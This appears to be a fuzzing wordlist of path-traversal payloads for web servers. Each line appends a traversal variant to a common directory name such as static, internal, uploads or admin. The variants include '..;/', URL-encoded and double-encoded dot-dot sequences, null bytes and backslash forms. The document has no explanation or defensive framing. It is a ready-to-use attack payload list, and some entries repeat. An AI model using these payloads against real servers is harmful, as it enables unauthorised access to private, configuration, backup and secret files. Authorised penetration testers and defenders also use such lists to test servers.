/static../
/internal../
/uploads../
/admin../
/assets../
/images../
/private../
/config../
/backup../
/logs../
/data../
/files../
/secrets../
/static/..;/
/static/....//
/static/%2e%2e/
/static/%2e%2e%2f/
/static/%252e%252e/
/static/..%00/
/static/%00../
/static/%2f%2e%2e%2f/
/static//%2e%2e%2f/
/static/%2e%2e%5c/
/static/%5c%2e%2e%5c/
/static//....//
/static/%2e%2e./
/static/%2e./
/static/....;/
/static//....;/
/static%20../
/static..;/
/static?.;/
/static?.%2f/
/static//%2e%2e/
/static/%2e%2e?/
/static/%3F..%2F/
/static/%2e%2e%2e%2e/
/static//%2e%2e%2f%2e%2e/
/static/%252e%252e%252f/
/internal../
/uploads../
/admin../
/assets../
/images../
/private../
/config../
/backup../
/logs../
/data../
/files../
/secrets../
/internal/..;/
/internal/....//
/internal/%2e%2e/
/internal/%2e%2e%2f/
/internal/%252e%252e/
/internal/..%00/
/internal/%00../
/internal/%2f%2e%2e%2f/
/internal//%2e%2e%2f/
/internal/%2e%2e%5c/
/internal/%5c%2e%2e%5c/
/internal//....//
/internal/%2e%2e./
/internal/%2e./
/internal/....;/
/internal//....;/
/internal%20../
/internal..;/
/internal?.;/
/internal?.%2f/
/internal//%2e%2e/
/internal/%2e%2e?/
/internal/%3F..%2F/
/internal/%2e%2e%2e%2e/
/internal//%2e%2e%2f%2e%2e/
/internal/%252e%252e%252f/
/uploads/..;/
/uploads/....//
/uploads/%2e%2e/
/uploads/%2e%2e%2f/
/uploads/%252e%252e/
/uploads/..%00/
/uploads/%00../
/uploads/%2f%2e%2e%2f/
/uploads//%2e%2e%2f/
/uploads/%2e%2e%5c/
/uploads/%5c%2e%2e%5c/
/uploads//....//
/uploads/%2e%2e./
/uploads/%2e./
/uploads/....;/
/uploads//....;/
/uploads%20../
/uploads..;/
/uploads?.;/
/uploads?.%2f/
/uploads//%2e%2e/
/uploads/%2e%2e?/
/uploads/%3F..%2F/
/uploads/%2e%2e%2e%2e/
/uploads//%2e%2e%2f%2e%2e/
/uploads/%252e%252e%252f/
/admin/..;/
/admin/....//
/admin/%2e%2e/
/admin/%2e%2e%2f/
/admin/%252e%252e/
/admin/..%00/
/admin/%00../
/admin/%2f%2e%2e%2f/
/admin//%2e%2e%2f/
/admin/%2e%2e%5c/
/admin/%5c%2e%2e%5c/
/admin//....//
/admin/%2e%2e./
/admin/%2e./
/admin/....;/
/admin//....;/
/admin%20../
/admin..;/
/admin?.;/
/admin?.%2f/
/admin//%2e%2e/
/admin/%2e%2e?/
/admin/%3F..%2F/
/admin/%2e%2e%2e%2e/
/admin//%2e%2e%2f%2e%2e/
/admin/%252e%252e%252f/
